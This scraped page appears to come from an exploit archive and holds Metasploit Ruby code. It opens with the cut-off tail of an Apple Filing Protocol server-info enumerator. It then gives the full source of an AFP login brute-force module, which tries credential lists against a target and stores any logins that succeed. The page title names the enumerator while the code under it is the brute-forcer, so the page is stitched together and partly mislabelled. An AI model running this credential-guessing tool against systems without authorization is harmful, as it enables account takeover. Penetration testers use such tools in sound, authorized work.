AFP:\n#{report_info}"    lines.split(/\n/).each do |line|      print_status(line)    end    report_note(:host => datastore['RHOST'],      :proto => 'tcp',      :port => datastore['RPORT'],      :type => 'afp_server_info',      :data => response)      report_service(        :host => datastore['RHOST'],        :port => datastore['RPORT'],        :proto => 'tcp',        :name => "afp",        :info => "AFP name: #{response[:utf8_server_name]}, Versions: #{response[:versions].join(', ')}"      )  end  def format_flags_report(parsed_flags)    report = ''    parsed_flags.each do |flag, val|      report << "AFP #{rhost}:#{rport}     *  #{flag}: #{val.to_s} \n"    end    return report  end  def format_addresses_report(parsed_network_addresses)    report = ''    parsed_network_addresses.each do |val|      report << "AFP #{rhost}:#{rport}     *  #{val.to_s} \n"    end    return report  endend

Apple Filing Protocol Info Enumerator

This Metasploit module attempts to bruteforce authentication credentials for AFP.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'openssl'require 'metasploit/framework/credential_collection'require 'metasploit/framework/login_scanner/afp'class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::AuthBrute  include Msf::Exploit::Remote::AFP  def initialize(info={})    super(update_info(info,      'Name'         => 'Apple Filing Protocol Login Utility',      'Description'  => %q{        This module attempts to bruteforce authentication credentials for AFP.      },      'References'     =>        [          [ 'URL', 'https://web.archive.org/web/20130309051753/https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],          [ 'URL', 'https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]        ],      'Author'       => [ 'Gregory Man <man.gregory[at]gmail.com>' ],      'License'      => MSF_LICENSE    ))    register_options(      [        Opt::Proxies,        OptInt.new('LoginTimeOut', [ true, "Timeout on login", 23 ]),        OptBool.new('RECORD_GUEST', [ false, "Record guest login to the database", false]),        OptBool.new('CHECK_GUEST', [ false, "Check for guest login", true])      ], self)  end  def run_host(ip)    print_status("Scanning IP: #{ip.to_s}")    cred_collection = build_credential_collection(        username: datastore['USERNAME'],        password: datastore['PASSWORD'],    )    scanner = Metasploit::Framework::LoginScanner::AFP.new(      configure_login_scanner(        host: ip,        port: rport,        proxies: datastore['PROXIES'],        cred_details: cred_collection,        stop_on_success: datastore['STOP_ON_SUCCESS'],        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],        connection_timeout: 30,        max_send_size: datastore['TCP::max_send_size'],        send_delay: datastore['TCP::send_delay'],        framework: framework,        framework_module: self,        ssl: datastore['SSL'],        ssl_version: datastore['SSLVersion'],        ssl_verify_mode: datastore['SSLVerifyMode'],        ssl_cipher: datastore['SSLCipher'],        local_port: datastore['CPORT'],        local_host: datastore['CHOST']      )    )    scanner.scan! do |result|      credential_data = result.to_h      credential_data.merge!(          module_fullname: self.fullname,          workspace_id: myworkspace_id      )      if result.success?        credential_core = create_credential(credential_data)        credential_data[:core] = credential_core        create_credential_login(credential_data)        print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"      else        invalidate_login(credential_data)        vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"      end    end  endend

Tag

#web